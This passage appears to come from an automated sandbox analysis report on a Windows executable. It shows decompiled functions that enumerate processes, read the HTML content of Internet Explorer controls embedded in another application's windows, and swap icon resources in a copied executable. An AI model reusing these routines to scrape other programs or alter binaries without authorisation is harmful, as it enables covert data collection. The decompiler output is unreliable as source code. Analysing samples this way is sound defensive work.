    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00428853
    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00428860
    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0042886D
    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0042887A
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: AddressProc$HandleModule
    • String ID: CreateToolhelp32Snapshot$KERNEL32.DLL$Module32First$Module32Next$Process32First$Process32Next
    • API String ID: 667068680-2096788425
    • Opcode ID: 9ba64fbbe09a19a617339d882a063d79c8c7cb97a90908c36c6f33e9e35bffea
    • Instruction ID: cc7b184a48323da2091fa4ad70c40b7f8c90e7428d5005af2d79f0672d1736af
    • Opcode Fuzzy Hash: 9ba64fbbe09a19a617339d882a063d79c8c7cb97a90908c36c6f33e9e35bffea
    • Instruction Fuzzy Hash: 33014471A0171499D7206BA9BC5D72B7EB4ABC1B56F94003FA404961E3DBB89484CA5C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 42%
    			E004208E1(void* __eax) {
    
    				_push("None");
    				L0043DE26();
    				_push("User defined");
    				L0043DE26();
    				_push("Open");
    				L0043DE26();
    				_push("Print");
    				L0043DE26();
    				_push("Explore");
    				L0043DE26();
    				_push("E-mail");
    				L0043DE26();
    				return __eax;
    			}

    Instruction address of each statement line above, in order: 0x004208e1, 0x004208eb, 0x004208f0, 0x004208fa, 0x004208ff, 0x00420909, 0x0042090e, 0x00420918, 0x0042091d, 0x00420927, 0x0042092c, 0x00420936, 0x0042093b

    APIs
    • #537.MFC42(None,004208DC), ref: 004208EB
    • #537.MFC42(User defined,None,004208DC), ref: 004208FA
    • #537.MFC42(Open,User defined,None,004208DC), ref: 00420909
    • #537.MFC42(Print,Open,User defined,None,004208DC), ref: 00420918
    • #537.MFC42(Explore,Print,Open,User defined,None,004208DC), ref: 00420927
    • #537.MFC42(E-mail,Explore,Print,Open,User defined,None,004208DC), ref: 00420936
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #537
    • String ID: E-mail$Explore$None$Open$Print$User defined
    • API String ID: 4256512136-3616938308
    • Opcode ID: 4a8a22de88ef76a2bfab6a0586c7707e5de2535b0d215606727d881d4494e333
    • Instruction ID: 6120b2addace4222eaaeac37d44fe7698a3086c8b87ceff3d6e34201199b1112
    • Opcode Fuzzy Hash: 4a8a22de88ef76a2bfab6a0586c7707e5de2535b0d215606727d881d4494e333
    • Instruction Fuzzy Hash: F5D06200F41D519215187E65E47393D5802C7DC7D7760A31F7D021E1C38D4C0E5C426D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 42%
    			E0040C1DD(void* __eax) {
    
    				_push("None");
    				L0043DE26();
    				_push("User defined");
    				L0043DE26();
    				_push("Open");
    				L0043DE26();
    				_push("Print");
    				L0043DE26();
    				_push("Explore");
    				L0043DE26();
    				_push("E-mail");
    				L0043DE26();
    				return __eax;
    			}

    APIs
    • #537.MFC42(None,0040C1D8), ref: 0040C1E7
    • #537.MFC42(User defined,None,0040C1D8), ref: 0040C1F6
    • #537.MFC42(Open,User defined,None,0040C1D8), ref: 0040C205
    • #537.MFC42(Print,Open,User defined,None,0040C1D8), ref: 0040C214
    • #537.MFC42(Explore,Print,Open,User defined,None,0040C1D8), ref: 0040C223
    • #537.MFC42(E-mail,Explore,Print,Open,User defined,None,0040C1D8), ref: 0040C232
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #537
    • String ID: E-mail$Explore$None$Open$Print$User defined
    • API String ID: 4256512136-3616938308
    • Opcode ID: ccda3bbabe923e6d9bd632eb6c203bb9a2490e24ff978b52aad828c7e19f6287
    • Instruction ID: e4fe4bb020ec346e5e4ffff844239034bfe20aff44d8361f20ff764548cddc28
    • Opcode Fuzzy Hash: ccda3bbabe923e6d9bd632eb6c203bb9a2490e24ff978b52aad828c7e19f6287
    • Instruction Fuzzy Hash: ACD0B200F54F40E245147E61E43353D5942DB9CFC7B90A56FBD051E1E38DCC5A1C462D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 42%
    			E00418DE2(void* __eax) {
    
    				_push("None");
    				L0043DE26();
    				_push("User defined");
    				L0043DE26();
    				_push("Open");
    				L0043DE26();
    				_push("Print");
    				L0043DE26();
    				_push("Explore");
    				L0043DE26();
    				_push("E-mail");
    				L0043DE26();
    				return __eax;
    			}

    APIs
    • #537.MFC42(None,00418DDD), ref: 00418DEC
    • #537.MFC42(User defined,None,00418DDD), ref: 00418DFB
    • #537.MFC42(Open,User defined,None,00418DDD), ref: 00418E0A
    • #537.MFC42(Print,Open,User defined,None,00418DDD), ref: 00418E19
    • #537.MFC42(Explore,Print,Open,User defined,None,00418DDD), ref: 00418E28
    • #537.MFC42(E-mail,Explore,Print,Open,User defined,None,00418DDD), ref: 00418E37
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #537
    • String ID: E-mail$Explore$None$Open$Print$User defined
    • API String ID: 4256512136-3616938308
    • Opcode ID: 8ea4d9701f576b8d0bb57b9b318c5dc9661946cb1bcca5c75464b0e8b31425bd
    • Instruction ID: d8e681bb3b3556ab0d8969b4d10cae8964d1c340cf36fced61d5ae8636ac7acc
    • Opcode Fuzzy Hash: 8ea4d9701f576b8d0bb57b9b318c5dc9661946cb1bcca5c75464b0e8b31425bd
    • Instruction Fuzzy Hash: 55D06200F40D409209187E51E43373D4842C79D7CB7B0A13F7D011F1D38D4C0A5D412D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 39%
    			E0041AAFE(void* __ecx, void* __eflags) {
    				intOrPtr* _t43;
    				intOrPtr* _t46;
    				intOrPtr _t53;
    				intOrPtr _t56;
    				void* _t60;
    				signed int _t69;
    				void* _t94;
    				void* _t97;
    
    				E0043E4E0(0x441490, _t97);
    				_t94 = __ecx;
    				L0043DF94();
    				_t43 = E00429029(_t97 - 0x10, 0xe034);
    				_push(0);
    				_push(0);
    				_t60 = _t94 + 0x68;
    				_push( *_t43);
    				_push(0);
    				_push(1);
    				 *(_t97 - 4) = 0;
    				L0043E0C0();
    				 *(_t97 - 4) =  *(_t97 - 4) | 0xffffffff;
    				L0043DD36();
    				_t46 = E00429029(_t97 - 0x14, 0xe033);
    				_t69 = 1;
    				_push(0);
    				_push(0);
    				_push( *_t46);
    				_push(_t69);
    				 *(_t97 - 4) = _t69;
    				_push(_t69);
    				L0043E0C0();
    				 *(_t97 - 4) =  *(_t97 - 4) | 0xffffffff;
    				L0043DD36();
    				SendMessageA( *(_t94 + 0x88), 0x130a, 0, _t97 - 0x34);
    				 *((intOrPtr*)(_t97 - 0x28)) =  *((intOrPtr*)(_t97 - 0x28)) + 1;
    				GetWindowRect( *(_t94 + 0x88), _t97 - 0x24);
    				_push(_t60);
    				_push(0xbc);
    				 *((intOrPtr*)(_t94 + 0x3e8)) =  *((intOrPtr*)(_t94 + 0x64));
    				L0043E0BA();
    				_t53 =  *((intOrPtr*)(_t97 - 0x28));
    				_push(4);
    				_push( *((intOrPtr*)(_t97 - 0x30)) -  *((intOrPtr*)(_t97 - 0x20)) - _t53 +  *((intOrPtr*)(_t97 - 0x18)));
    				_push( *((intOrPtr*)(_t97 - 0x1c)) -  *(_t97 - 0x24));
    				_push(_t53 -  *((intOrPtr*)(_t97 - 0x30)));
    				_push(0);
    				_push(0);
    				L0043E0B4();
    				_push(5);
    				L0043E0AE();
    				_push(_t60);
    				 *((intOrPtr*)(_t94 + 0x330)) =  *((intOrPtr*)(_t94 + 0x64));
    				_push(0xbb);
    				L0043E0BA();
    				_t56 =  *((intOrPtr*)(_t97 - 0x28));
    				_push(4);
    				_push( *((intOrPtr*)(_t97 - 0x30)) -  *((intOrPtr*)(_t97 - 0x20)) - _t56 +  *((intOrPtr*)(_t97 - 0x18)));
    				_push( *((intOrPtr*)(_t97 - 0x1c)) -  *(_t97 - 0x24));
    				_push(_t56 -  *((intOrPtr*)(_t97 - 0x30)));
    				_push(0);
    				_push(0);
    				L0043E0B4();
    				 *[fs:0x0] =  *((intOrPtr*)(_t97 - 0xc));
    				return 0;
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 0041AB03
    • #4710.MFC42 ref: 0041AB10
      • Part of subcall function 00429029: #1168.MFC42(00000002), ref: 00429052
      • Part of subcall function 00429029: LoadStringA.USER32 ref: 0042906A
      • Part of subcall function 00429029: #537.MFC42(00000001), ref: 0042907A
    • #6785.MFC42(00000001,00000000,?,00000000,00000000), ref: 0041AB37
    • #800.MFC42(00000001,00000000,?,00000000,00000000), ref: 0041AB43
    • #6785.MFC42(00000001,00000001,?,00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0041AB67
    • #800.MFC42(00000001,00000001,?,00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0041AB73
    • SendMessageA.USER32(?,0000130A,00000000,?), ref: 0041AB88
    • GetWindowRect.USER32 ref: 0041AB9B
    • #2086.MFC42(000000BC,?), ref: 0041ABB6
    • #6197.MFC42(00000000,00000000,?,?,?,00000004,000000BC,?), ref: 0041ABDF
    • #6215.MFC42(00000005,00000000,00000000,?,?,?,00000004,000000BC,?), ref: 0041ABEC
    • #2086.MFC42(000000BB,?,00000005,00000000,00000000,?,?,?,00000004,000000BC,?), ref: 0041AC08
    • #6197.MFC42(00000000,00000000,?,?,?,00000004,000000BB,?,00000005,00000000,00000000,?,?,?,00000004,000000BC), ref: 0041AC2D
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #2086#6197#6785#800$#1168#4710#537#6215H_prologLoadMessageRectSendStringWindow
    • String ID:
    • API String ID: 2000107981-0
    • Opcode ID: d6bbc5df169f1a800bb89b471a498c62810dd4ddbed4d7975560cbf4da3130ff
    • Instruction ID: 711013d8f30aee6a9544559c11b86ef6319ac96989f8aa6d0100954685e50752
    • Opcode Fuzzy Hash: d6bbc5df169f1a800bb89b471a498c62810dd4ddbed4d7975560cbf4da3130ff
    • Instruction Fuzzy Hash: 0B414F71900218AFDB18EBBADD95EEFB7B8FB88714F00051DF516A71C0DA746A41CB24
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 72%
    			E0040AF77(intOrPtr __ecx) {
    				struct HWND__* _t98;
    				struct HWND__* _t99;
    				intOrPtr _t103;
    				intOrPtr* _t108;
    				intOrPtr* _t110;
    				intOrPtr* _t112;
    				intOrPtr* _t114;
    				intOrPtr* _t117;
    				void* _t119;
    				intOrPtr* _t120;
    				intOrPtr* _t121;
    				intOrPtr* _t125;
    				intOrPtr* _t127;
    				intOrPtr* _t129;
    				intOrPtr* _t131;
    				intOrPtr* _t133;
    				void* _t136;
    				void* _t137;
    				intOrPtr* _t138;
    				void* _t139;
    				intOrPtr* _t140;
    				intOrPtr* _t141;
    				intOrPtr* _t142;
    				intOrPtr* _t143;
    				intOrPtr _t174;
    				struct HWND__* _t195;
    				void* _t196;
    				void* _t197;
    
    				E0043E4E0(0x43fc5c, _t197);
    				 *((intOrPtr*)(_t197 - 0x28)) = __ecx;
    				 *(_t197 - 0x38) = 0;
    				_t98 = 0;
    				while(1) {
    					_t99 = FindWindowExA( *(_t197 + 0xc), _t98, "__oxFrame.class__", 0);
    					 *(_t197 - 0x38) = _t99;
    					if(_t99 == 0) {
    						break;
    					}
    					_t195 = FindWindowExA(_t99, 0, "Internet Explorer_Server", 0);
    					if(_t195 == 0 || IsWindowVisible(_t195) == 0) {
    						L29:
    						_t98 =  *(_t197 - 0x38);
    						continue;
    					} else {
    						_t103 =  *((intOrPtr*)(_t197 - 0x28));
    						if( *((intOrPtr*)(_t103 + 0xc)) == 0) {
    							goto L29;
    						}
    						SendMessageTimeoutA(_t195,  *(_t103 + 4), 0, 0, 2, 0x96, _t197 - 0x30);
    						 *((intOrPtr*)(_t197 - 0x24)) = 0;
    						 *(_t197 - 4) = 0;
    						_push(_t197 - 0x24);
    						_push(0);
    						_push(0x44a5c4);
    						_push( *(_t197 - 0x30));
    						if( *((intOrPtr*)( *((intOrPtr*)(_t197 - 0x28)) + 0xc))() < 0) {
    							L27:
    							_t108 =  *((intOrPtr*)(_t197 - 0x24));
    							 *(_t197 - 4) =  *(_t197 - 4) | 0xffffffff;
    							if(_t108 != 0) {
    								 *((intOrPtr*)( *_t108 + 8))(_t108);
    							}
    							goto L29;
    						}
    						 *((intOrPtr*)(_t197 - 0x14)) = 0;
    						_t110 =  *((intOrPtr*)(_t197 - 0x24));
    						_push(_t197 - 0x14);
    						_push(_t110);
    						 *(_t197 - 4) = 1;
    						if( *((intOrPtr*)( *_t110 + 0x5c))() < 0) {
    							L25:
    							_t112 =  *((intOrPtr*)(_t197 - 0x14));
    							 *(_t197 - 4) = 0;
    							if(_t112 != 0) {
    								 *((intOrPtr*)( *_t112 + 8))(_t112);
    							}
    							goto L27;
    						}
    						_t114 =  *((intOrPtr*)(_t197 - 0x14));
    						 *((intOrPtr*)( *_t114 + 0x20))(_t114, _t197 - 0x2c);
    						_t196 = 0;
    						if( *((intOrPtr*)(_t197 - 0x2c)) <= 0) {
    							goto L25;
    						} else {
    							goto L8;
    						}
    						do {
    							L8:
    							 *((intOrPtr*)(_t197 - 0x20)) = 0;
    							 *((intOrPtr*)(_t197 - 0x1c)) = 0;
    							 *(_t197 - 4) = 3;
    							E0040B247(_t197 - 0x48, _t196, 3);
    							_t117 =  *((intOrPtr*)(_t197 - 0x14));
    							_push(_t197 - 0x58);
    							_push(_t197 - 0x48);
    							_push(_t117);
    							 *(_t197 - 4) = 4;
    							if( *((intOrPtr*)( *_t117 + 0x1c))() < 0) {
    								goto L18;
    							}
    							_t125 =  *((intOrPtr*)(_t197 - 0x50));
    							_push(_t197 - 0x20);
    							_push(0x44a5b4);
    							_push(_t125);
    							if( *((intOrPtr*)( *_t125))() < 0) {
    								goto L18;
    							}
    							_t127 =  *((intOrPtr*)(_t197 - 0x20));
    							_push(_t197 - 0x1c);
    							_push(_t127);
    							if( *((intOrPtr*)( *_t127 + 0xd0))() < 0) {
    								goto L18;
    							}
    							 *((intOrPtr*)(_t197 - 0x18)) = 0;
    							_t129 =  *((intOrPtr*)(_t197 - 0x1c));
    							_push(_t197 - 0x18);
    							_push(_t129);
    							 *(_t197 - 4) = 5;
    							if( *((intOrPtr*)( *_t129 + 0x24))() < 0) {
    								L16:
    								_t131 =  *((intOrPtr*)(_t197 - 0x18));
    								 *(_t197 - 4) = 4;
    								if(_t131 != 0) {
    									 *((intOrPtr*)( *_t131 + 8))(_t131);
    								}
    								goto L18;
    							}
    							_t133 =  *((intOrPtr*)(_t197 - 0x18));
    							_push(_t197 - 0x34);
    							_push(_t133);
    							if( *((intOrPtr*)( *_t133 + 0xf0))() < 0) {
    								goto L16;
    							}
    							_push( *((intOrPtr*)(_t197 - 0x34)));
    							E00409C88(_t197 - 0x10);
    							 *(_t197 - 4) = 6;
    							_t136 = E0040B230(_t197 - 0x10);
    							_t174 =  *((intOrPtr*)(_t197 - 0x10));
    							if(_t136 > 0) {
    								if(_t174 == 0) {
    									_t137 = 0;
    								} else {
    									_t137 = E00409D10(_t174);
    								}
    								_push(_t137);
    								L0043DE26();
    								_t176 =  *((intOrPtr*)(_t197 - 0x10));
    								if( *((intOrPtr*)(_t197 - 0x10)) != 0) {
    									E004096DD(_t176);
    									 *((intOrPtr*)(_t197 - 0x10)) = 0;
    								}
    								_t138 =  *((intOrPtr*)(_t197 - 0x18));
    								 *(_t197 - 4) = 4;
    								if(_t138 != 0) {
    									 *((intOrPtr*)( *_t138 + 8))(_t138);
    								}
    								_t139 = _t197 - 0x48;
    								 *(_t197 - 4) = 3;
    								__imp__#9(_t139);
    								if(_t139 < 0) {
    									E0043E9F0(_t139);
    								}
    								_t140 =  *((intOrPtr*)(_t197 - 0x1c));
    								 *(_t197 - 4) = 2;
    								if(_t140 != 0) {
    									 *((intOrPtr*)( *_t140 + 8))(_t140);
    								}
    								_t141 =  *((intOrPtr*)(_t197 - 0x20));
    								 *(_t197 - 4) = 1;
    								if(_t141 != 0) {
    									 *((intOrPtr*)( *_t141 + 8))(_t141);
    								}
    								_t142 =  *((intOrPtr*)(_t197 - 0x14));
    								 *(_t197 - 4) = 0;
    								if(_t142 != 0) {
    									 *((intOrPtr*)( *_t142 + 8))(_t142);
    								}
    								_t143 =  *((intOrPtr*)(_t197 - 0x24));
    								 *(_t197 - 4) =  *(_t197 - 4) | 0xffffffff;
    								if(_t143 != 0) {
    									 *((intOrPtr*)( *_t143 + 8))(_t143);
    								}
    								L48:
    								 *[fs:0x0] =  *((intOrPtr*)(_t197 - 0xc));
    								return  *((intOrPtr*)(_t197 + 8));
    							} else {
    								if(_t174 != 0) {
    									E004096DD(_t174);
    									 *((intOrPtr*)(_t197 - 0x10)) = 0;
    								}
    								goto L16;
    							}
    							L18:
    							_t119 = _t197 - 0x48;
    							 *(_t197 - 4) = 3;
    							__imp__#9(_t119);
    							if(_t119 < 0) {
    								E0043E9F0(_t119);
    							}
    							_t120 =  *((intOrPtr*)(_t197 - 0x1c));
    							 *(_t197 - 4) = 2;
    							if(_t120 != 0) {
    								 *((intOrPtr*)( *_t120 + 8))(_t120);
    							}
    							_t121 =  *((intOrPtr*)(_t197 - 0x20));
    							 *(_t197 - 4) = 1;
    							if(_t121 != 0) {
    								 *((intOrPtr*)( *_t121 + 8))(_t121);
    							}
    							_t196 = _t196 + 1;
    						} while (_t196 <  *((intOrPtr*)(_t197 - 0x2c)));
    						goto L25;
    					}
    				}
    				_push(0x4550cc);
    				L0043DE26();
    				goto L48;
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 0040AF7C
    • FindWindowExA.USER32 ref: 0040AFA1
    • FindWindowExA.USER32 ref: 0040AFB6
    • IsWindowVisible.USER32(00000000), ref: 0040AFC3
    • SendMessageTimeoutA.USER32(00000000,?,00000000,00000000,00000002,00000096,?), ref: 0040AFEE
    • VariantClear.OLEAUT32(?), ref: 0040B117
    • #537.MFC42(00000000,?), ref: 0040B18D
    • VariantClear.OLEAUT32(?), ref: 0040B1BA
      • Part of subcall function 00409C88: __EH_prolog.LIBCMT ref: 00409C8D
      • Part of subcall function 00409C88: #823.MFC42(0000000C,?,?,00409C09,?), ref: 00409C98
      • Part of subcall function 0040B230: SysStringLen.OLEAUT32(?), ref: 0040B23D
      • Part of subcall function 004096DD: InterlockedDecrement.KERNEL32(?), ref: 004096E5
      • Part of subcall function 004096DD: #825.MFC42(?,?,?,00409C31,00000000,?), ref: 004096FB
    • #537.MFC42(004550CC), ref: 0040B217
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: Window$#537ClearFindH_prologVariant$#823#825DecrementInterlockedMessageSendStringTimeoutVisible
    • String ID: Internet Explorer_Server$__oxFrame.class__
    • API String ID: 2030211506-2130105940
    • Opcode ID: 4803cb8ab8e7e75c336869eebb68517a9ddeeb149cf9f22aaf2aa75b5ac8771f
    • Instruction ID: ff4c85a8c34329071e528f010ba7848a82558d54f1513503db4c9009f77d86a4
    • Opcode Fuzzy Hash: 4803cb8ab8e7e75c336869eebb68517a9ddeeb149cf9f22aaf2aa75b5ac8771f
    • Instruction Fuzzy Hash: 4BA11F70A00249EFCB10DFE4C898AAEBBB9EF49344F24446DE505FB291C7789D45CB69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041C752(intOrPtr* __ecx, void* __edi, CHAR* _a4, void* _a8) {
    				signed int _v8;
    				char _v268;
    				char _v528;
    				intOrPtr _t60;
    				struct HINSTANCE__* _t70;
    				void* _t71;
    				char* _t82;
    				int _t83;
    				void* _t84;
    				_Unknown_base(*)()* _t85;
    				signed int _t91;
    				void* _t92;
    				CHAR* _t102;
    				signed short* _t103;
    				intOrPtr* _t105;
    				void* _t127;
    
    				_v8 = _v8 | 0xffffffff;
    				_t105 = __ecx;
    				_t83 = 0;
    				if( *((intOrPtr*)(__ecx + 0x10)) == 0 ||  *((intOrPtr*)(__ecx + 0x18)) == 0 ||  *((intOrPtr*)(__ecx + 0x14)) == 0 || GetTempPathA(0x104,  &_v528) == 0 || GetTempFileNameA( &_v528, "bpk", 0,  &_v268) == 0 || CopyFileA(_a4,  &_v268, 0) == 0) {
    					return 0;
    				} else {
    					_t60 =  *((intOrPtr*)(_t105 + 0x10))( &_v268, 0, __edi);
    					 *_t105 = _t60;
    					if(_t60 == 0) {
    						L30:
    						E0041C726(_t105);
    						if(_v8 != _t83) {
    							L33:
    							if(_t127 < 0) {
    								E0041C947(_t105, _t83);
    							}
    							L35:
    							DeleteFileA( &_v268);
    							return 0 | _v8 == _t83;
    						}
    						if(CopyFileA( &_v268, _a4, _t83) != 0) {
    							goto L35;
    						}
    						_v8 = _v8 | 0xffffffff;
    						_t127 = _v8 - _t83;
    						goto L33;
    					}
    					_t102 = 0xe;
    					 *((intOrPtr*)(_t105 + 0x14))(_t60, _t102, 0x64,  *((intOrPtr*)(_t105 + 0xc)), 0, 0);
    					_t70 = LoadLibraryA(_a8);
    					 *(_t105 + 4) = _t70;
    					if(_t70 == 0) {
    						_v8 = 1;
    						goto L30;
    					}
    					if( *((intOrPtr*)(_t105 + 0x24)) == 0) {
    						L13:
    						_t71 = E0041C9A7(_t105, "MAINICON", _t102);
    						if(_t71 != _t83) {
    							L18:
    							_t91 =  *(_t71 + 4) & 0x0000ffff;
    							_t92 = _t91 - 1;
    							if(_t91 == 0) {
    								L22:
    								_v8 = _t83;
    								goto L30;
    							}
    							_t28 = _t71 + 0x12; // 0x12
    							_t103 = _t28;
    							_t84 = _t92 + 1;
    							do {
    								E0041C9A7(_t105,  *_t103 & 0x0000ffff, 3);
    								_t103 =  &(_t103[7]);
    								_t84 = _t84 - 1;
    							} while (_t84 != 0);
    							_t83 = 0;
    							goto L22;
    						}
    						_a8 = _a8 | 0xffffffff;
    						_t85 = E0041C989;
    						if(EnumResourceNamesA( *(_t105 + 4), _t102, E0041C989,  &_a8) == 0 || _a8 < 0) {
    							_a8 = _a8 | 0xffffffff;
    							if(EnumResourceNamesA( *(_t105 + 4), 3, _t85,  &_a8) == 0 || _a8 < 0 || E0041C9A7(_t105, _a8 & 0x0000ffff, 3) == 0) {
    								_v8 = 2;
    							} else {
    								_v8 = _v8 & 0x00000000;
    							}
    							goto L29;
    						} else {
    							_t71 = E0041C9A7(_t105, _a8 & 0x0000ffff, 0xe);
    							if(_t71 == 0) {
    								L29:
    								_t83 = 0;
    								goto L30;
    							}
    							_t83 = 0;
    							goto L18;
    						}
    					}
    					if(strcmp( *(_t105 + 0x1c), 0x4550cc) != 0) {
    						_t82 =  *(_t105 + 0x1c);
    					} else {
    						_t82 =  *(_t105 + 0x20);
    					}
    					_t71 = E0041C9A7(_t105, _t82, _t102);
    					if(_t71 != _t83) {
    						goto L18;
    					} else {
    						goto L13;
    					}
    				}
    			}

    APIs
    • GetTempPathA.KERNEL32(00000104,?), ref: 0041C78C
    • GetTempFileNameA.KERNEL32(?,bpk,00000000,?), ref: 0041C7AE
    • CopyFileA.KERNEL32(?,?,00000000), ref: 0041C7C7
    • LoadLibraryA.KERNEL32(?), ref: 0041C7FF
    • strcmp.MSVCRT ref: 0041C81D
    • EnumResourceNamesA.KERNEL32 ref: 0041C866
    • EnumResourceNamesA.KERNEL32 ref: 0041C8C8
    • CopyFileA.KERNEL32(?,?,00000000), ref: 0041C90D
    • DeleteFileA.KERNEL32(?), ref: 0041C92F
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: File$CopyEnumNamesResourceTemp$DeleteLibraryLoadNamePathstrcmp
    • String ID: MAINICON$bpk
    • API String ID: 1789158672-2105560083
    • Opcode ID: cf1cd4e851163cce69de40d3f47791d20a31fa57d18228b2b51ab5566016067c
    • Instruction ID: c2eefb00d127a9bf25f53e05fb0f3bbdf1ac41dbb1b711e3978f1e215856471e
    • Opcode Fuzzy Hash: cf1cd4e851163cce69de40d3f47791d20a31fa57d18228b2b51ab5566016067c
    • Instruction Fuzzy Hash: 4D51DFB1640205EFDB20AFA5CDC9BEF77A8AB04715F10812FB556D2190E778CAC4CB28
    Uniqueness

    Uniqueness Score: -1.00%
